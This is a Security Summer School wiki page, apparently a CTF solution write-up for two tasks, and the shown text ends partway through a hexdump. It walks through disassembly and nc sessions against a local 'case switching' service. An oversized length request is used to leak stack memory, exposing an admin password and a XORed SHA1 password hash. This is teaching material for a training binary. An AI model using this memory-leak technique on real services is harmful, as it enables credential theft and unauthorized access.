Security Summer School

User Tools

Site Tools

session:solution:mid-ctf_asks1_3

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision 		Previous revision
session:solution:mid-ctf_asks1_3 [2014/07/11 11:08]
rcaragea created 		session:solution:mid-ctf_asks1_3 [2020/07/19 12:49] (current)
Line 1: Line 1:
 ====== CTF Tasks 1 & 3 ====== ====== CTF Tasks 1 & 3 ======
  
 +We are presented with two binaries that do almost the same thing. Let's see what exactly:
 +
 +===== Task 1 =====
 +
 +<code bash>
 +# ./caseservice pass 4242
 +Server-side debug: login password is set to [example]
 +
 +.... in another terminal:
 +# nc 127.0.0.1 4242
 +==============================================
 +Welcome to the Case Switching service
 +==============================================
 +Make your choice (1 or 2):
 +1. Use service
 +2. Configure service (only for administrators)
 +
 +1
 +You selected [1]
 +Input: input size and then <size> bytes
 +10         
 +Bla bla bla
 +Here you go:
 +bLABLABL
 +
 +# nc 127.0.0.1 4242
 +==============================================
 +Welcome to the Case Switching service
 +==============================================
 +Make your choice (1 or 2):
 +1. Use service
 +2. Configure service (only for administrators)
 +
 +2
 +You selected [2]
 +Configuration is done through a shell
 +What is the administrator password?
 +password
 +Unauthorized login attempted.
 +</code>
 +
 +So, as the name implies, it switches the case of the input. How does it do that? We turn to the assembly of the function named **handle_use** where we see this loop.
 +<code asm>
 +   0x08048e16 <+116>: mov    DWORD PTR [ebp-0xc],0x0
 +   0x08048e1d <+123>: jmp    0x8048e41 <handle_use+159>
 +   0x08048e1f <+125>: lea    edx,[ebp-0x4c6]
 +   0x08048e25 <+131>: mov    eax,DWORD PTR [ebp-0xc]
 +   0x08048e28 <+134>: add    eax,edx
 +   0x08048e2a <+136>: movzx  eax,BYTE PTR [eax]
 +   0x08048e2d <+139>: xor    eax,0x20
 +   0x08048e30 <+142>: lea    ecx,[ebp-0x4c6]
 +   0x08048e36 <+148>: mov    edx,DWORD PTR [ebp-0xc]
 +   0x08048e39 <+151>: add    edx,ecx
 +   0x08048e3b <+153>: mov    BYTE PTR [edx],al
 +   0x08048e3d <+155>: add    DWORD PTR [ebp-0xc],0x1
 +   0x08048e41 <+159>: mov    eax,DWORD PTR [ebp-0x4cc]
 +   0x08048e47 <+165>: cmp    DWORD PTR [ebp-0xc],eax
 +   0x08048e4a <+168>: jb     0x8048e1f <handle_use+125>
 +
 +</code>
 +
 +So it XORs with 0x20 all the input (regardless of whether the input is made of letters or numbers, symbols, etc).
 +A question you should ask yourself is why does it need to know the input size? Let's try to fiddle with it:
 +
 +<code bash>
 +# nc 127.0.0.1 4242
 +==============================================
 +Welcome to the Case Switching service
 +==============================================
 +Make your choice (1 or 2):
 +1. Use service
 +2. Configure service (only for administrators)
 +
 +1
 +You selected [1]
 +Input: input size and then <size> bytes
 +10
 +A
 +Here you go:
 +....... (binary)
 +</code>
 +
 +Interesting how we get lots of unknown binary data out of it. Maybe there's something useful in there. Let's redirect to a file.
 +<code bash>
 +# nc 127.0.0.1 4242 > out
 +1
 +255
 +
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
 +00000130  f9 97 ec c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
 +00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
 +00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
 +00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..      !   t.|
 +00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
 +00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
 +00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
 +000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
 +000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
 +000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
 +000001d0  24 28 28 e0 24 28 27 20  20 20 74 c9 df 9f 27 20  |$((.$('   t...' |
 +000001e0  20 20 20 20 20 20 e3 69  bc 07 09 53 2a 5f a0 5e  |      .i...S*_.^|
 +000001f0  db a6 56 89 0d eb 4f aa  1f af 45 58 41 4d 50 4c  |..V...O...EXAMPL|
 +00000200  45 20 20 08 08 08 08 08  08 08 08 08 08 08 08 08  |E  .............|
 +00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
 +00000220  a1 a1 a1                                          |...|
 +00000223
 +
 +</code>
 +There's our password with the switched case! Let's try on the remote system.
 +<code bash>
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 2a 97 20 20  20 20 18 c9 df 9f e9 13  |go:.*.    ......|
 +00000130  f9 97 ec c8 df 9f 40 20  20 20 2c 20 20 20 30 8a  |......@   ,   0.|
 +00000140  e1 97 28 e0 24 28 e0 cf  df 97 20 d9 df 97 20 20  |..(.$(.... ...  |
 +00000150  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 20 94  |  .."  0  &q.. .|
 +00000160  f4 97 20 20 20 20 20 30  20 20 21 20 20 20 74 8e  |..      !   t.|
 +00000170  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 31 20  |..(.$(        1 |
 +00000180  20 20 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |  (.$(        t.|
 +00000190  f4 97 28 e0 24 28 20 20  20 20 a8 cd df 9f 5c f3  |..(.$(    ....\.|
 +000001a0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
 +000001b0  20 20 a8 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  ....P...    t.|
 +000001c0  f4 97 20 20 20 20 20 20  20 20 a8 cd df 9f bb ad  |..        ......|
 +000001d0  24 28 28 e0 24 28 2c 20  20 20 74 c9 df 9f 27 20  |$((.$(,   t...' |
 +000001e0  20 20 20 20 20 20 68 0e  5b fd 7b 7d 73 03 bc ac  |      h.[.{}s...|
 +000001f0  0a 3f 60 6f 4e 46 f9 c7  85 57 49 4e 54 45 4c 4c  |.?`oNF...WINTELL|
 +00000200  49 47 45 4e 43 45 20 20  08 08 08 08 08 08 08 08  |IGENCE  ........|
 +00000210  08 08 08 08 08 08 a1 a1  a1 a1 a1 a1 a1 a1 a1 a1  |................|
 +00000220  a1 a1 a1                                          |...|
 +00000223
 +</code>
 +So the password seems to be "wintelligence" but note that "EXAMPLE" in the first case was at offset 0x1fa. At 0x1fa in the second listing is "I" from "INTELLIGENCE"
 +Trying "intelligence" works and we are able to log in. 
 +
 +===== Task 3 =====
 +This task is supposedly more secure. Let's see just how secure by doing almost the same thing as before through **hexdump**
 +<code bash>
 +# nc 127.0.0.1 4242 > out
 +1
 +255
 +
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 2a df af 1f  aa 4f a0 df 9a 97 74 8e  |go:.*....O....t.|
 +00000130  f4 97 20 e0 24 28 20 30  22 20 48 e1 24 28 0d cc  |.. .$( 0" H.$(..|
 +00000140  e1 97 68 98 f4 97 20 20  20 20 68 c9 df 9f e9 13  |..h...    h.....|
 +00000150  f9 97 fc c8 df 9f 40 20  20 20 27 20 20 20 30 8a  |......@   '   0.|
 +00000160  e1 97 20 20 20 20 e0 cf  df 97 20 d9 df 97 20 20  |..    .... ...  |
 +00000170  20 20 b8 2e 22 20 20 30  20 20 26 71 e9 97 31 20  |  .."  0  &q..1 |
 +00000180  20 20 20 90 dd 97 20 30  20 20 21 20 20 20 74 8e  |   ... 0  !   t.|
 +00000190  f4 97 28 e0 24 28 20 20  20 20 20 20 20 20 ae 9a  |..(.$(        ..|
 +000001a0  e1 97 28 e0 24 28 20 20  20 20 20 20 20 20 74 8e  |..(.$(        t.|
 +000001b0  f4 97 28 e0 24 28 20 20  20 20 58 cd df 9f 5c f3  |..(.$(    X...\.|
 +000001c0  e0 97 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |..              |
 +000001d0  20 20 58 cd df 9f 50 0a  df 97 20 20 20 20 74 8e  |  X...P...    t.|
 +000001e0  f4 97 20 20 20 20 20 20  20 20 58 cd df 9f 1d ad  |..        X.....|
 +000001f0  24 28 28 e0 24 28 27 20  20 20 50 c9 df 9f 68 20  |$((.$('   P...h |
 +00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
 +00000210  01 0a                                             |..|
 +00000212
 +</code>
 +So even if we want 255 bytes it provides considerably less. Why is that?
 +In task 1 handle_use ended like this:
 +<code asm>
 +   0x08048e47 <+165>: cmp    DWORD PTR [ebp-0xc],eax
 +   0x08048e4a <+168>: jb     0x8048e1f <handle_use+125>
 +   0x08048e4c <+170>: mov    eax,DWORD PTR [ebp-0x4cc]
 +   0x08048e52 <+176>: mov    DWORD PTR [esp+0x8],eax
 +   0x08048e56 <+180>: lea    eax,[ebp-0x4c6]
 +   0x08048e5c <+186>: mov    DWORD PTR [esp+0x4],eax
 +   0x08048e60 <+190>: mov    eax,DWORD PTR [ebp+0x8]
 +   0x08048e63 <+193>: mov    DWORD PTR [esp],eax
 +   0x08048e66 <+196>: call   0x8048ab0 <write@plt>
 +   0x08048e6b <+201>: leave  
 +   0x08048e6c <+202>: ret  
 +</code>
 +Task 3 ends it like this:
 +<code asm>
 +   0x08048de6 <+162>: cmp    DWORD PTR [ebp-0xc],eax
 +   0x08048de9 <+165>: jb     0x8048dbe <handle_use+122>
 +   0x08048deb <+167>: lea    eax,[ebp-0x4c6]
 +   0x08048df1 <+173>: mov    DWORD PTR [esp],eax
 +   0x08048df4 <+176>: call   0x80489f0 <puts@plt>
 +   0x08048df9 <+181>: leave  
 +   0x08048dfa <+182>: ret
 +</code>
 +So instead of a **write** it does a **puts** stopping at the first NULL byte. We can bypass this by giving as input the exact amount of bytes until that NULL byte
 +
 +Let's try 210 bytes.
 +<code bash>
 +# nc 127.0.0.1 4242 > out
 +1
 +255
 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
 +00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001f0  41 41 41 41 41 41 2a 20  20 20 50 c9 df 9f 68 20  |AAAAAA*   P...h |
 +00000200  20 20 20 20 20 20 20 20  20 20 20 20 20 20 03 02  |              ..|
 +00000210  01 0a                                             |..|
 +00000212
 +</code>
 +We seem to be needing 2 + 8 + 8 + 8 + 2 = 28 bytes to pass the NULL. So we try 238 bytes
 +<code bash>
 +# nc 127.0.0.1 4242 > out
 +1
 +255
 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
 +00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000210  41 41 2a 69 bc 07 09 53  2a 5f a0 5e db a6 56 89  |AA*i...S*_.^..V.|
 +00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
 +0000022a
 +</code>
 +To pass the next null byte we would need 238 + 6 + 8 + 8 + 2 = 262 bytes which is more than what we can send.
 +Before doing assembly investigations let's do some dynamic analysis.
 +<code bash>
 +# ltrace ./caseservice_reload pass 4242
 +__libc_start_main(0x8048fab, 3, 0xbfffee84, 0x80491d0 <unfinished ...>
 +fopen("pass", "r"                                                                                                                     = 0x804c008
 +fgets("example\n", 1000, 0x804c008)                                                                                                     = 0xbfffe988
 +strlen("example\n"                                                                                                                    = 8
 +printf("Server-side debug: login passwor"..., "example"Server-side debug: login password is set to [example]
 +)                                                                                = 54
 +SHA1(0xbfffe988, 7, 0xbfffe970, 72)                                                                                                     = 0xbfffe970
 +fclose(0x804c008)                                                                                                                       = 0
 +atoi(0xbffff079, 0, 0x2cb4304e, 1)                                                                                                      = 4242
 +socket(2, 1, 0)                                                                                                                         = 3
 +bzero(0xbfffedb8, 16)                                                                                                                   = <void>
 +inet_addr("000.0.0.0"                                                                                                                 = 0
 +htons(4242, 16, 0, 1)                                                                                                                   = 0x9210
 +setsockopt(3, 1, 2, 0xbfffedcc)                                                                                                         = 0
 +bind(3, 0xbfffedb8, 16, 0xbfffedcc)                                                                                                     = 0
 +listen(3, 5, 16, 0xbfffedcc)                                                                                                            = 0
 +accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc)                                                                                           = 4
 +fork()                                                                                                                                  = 18145
 +close(4)                                                                                                                                = 0
 +accept(3, 0xbfffeda8, 0xbfffedc8, 0xbfffedcc <no return ...>
 +--- SIGCHLD (Child exited) ---
 +</code>
 +Notice the SHA1 hash call. If we look into **handle_configure** we see that the comparison (memcmp) is done against the hash of our input as well.
 +Since the SHA1 of the correct password is done at every program start maybe it's still on the stack. Let's check the hash of "example"
 +<code bash>
 +# echo -n "example" | sha1sum 
 +c3499c2729730a7f807efb8676a92dcb6f8a3f8f  -
 +</code>
 +
 +If we look at the beginning it doesn't seem to be in our hexdump. But the end is there:
 +<code bash>
 +00000220  0d eb 4f 8a 3f 8f 03 02  01 0a                    |..O.?.....|
 +</code>
 +Why would there be only 3 bytes? Remember the XOR function? 0x6f XOR 0x20 = 0x8f which is exactly the byte preceding these 3 bytes. Extrapolating, we see the whole hash with the first 17 bytes XORED thus easily recoverable.
 +
 +Let's try remote:
 +<code bash># nc 127.0.0.1 4242 > out
 +1
 +255
 +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 +# hexdump -Cv out 
 +00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
 +00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
 +00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
 +00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
 +00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
 +00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
 +00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
 +000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
 +000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
 +000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
 +000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
 +000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
 +000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
 +00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
 +00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
 +00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
 +00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 +00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
